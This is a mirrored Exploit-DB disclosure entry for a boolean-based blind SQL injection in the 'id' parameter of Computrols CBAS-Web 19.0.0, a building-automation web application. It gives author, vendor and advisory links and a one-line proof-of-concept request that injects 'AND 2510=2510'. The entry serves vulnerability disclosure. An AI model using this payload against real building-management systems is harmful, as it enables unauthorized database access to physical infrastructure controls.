CBAS-Web 19.0.0 – ‘id’ Boolean-based Blind SQL Injection

  • 作者: LiquidWorm
    日期: 2019-11-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47631/
  • # Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
    # Google Dork: NA
    # Date: 2019-11-11
    # Exploit Author: LiquidWorm
    # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
    # Software Link: https://www.computrols.com/building-automation-software/
    # Version: 19.0.0
    # Tested on: NA
    # CVE : N/A
    # Advisory: https://applied-risk.com/resources/ar-2019-009
    # Paper: https://applied-risk.com/resources/i-own-your-building-management-system
    
    # Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
    # PoC (id param):
    
    http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510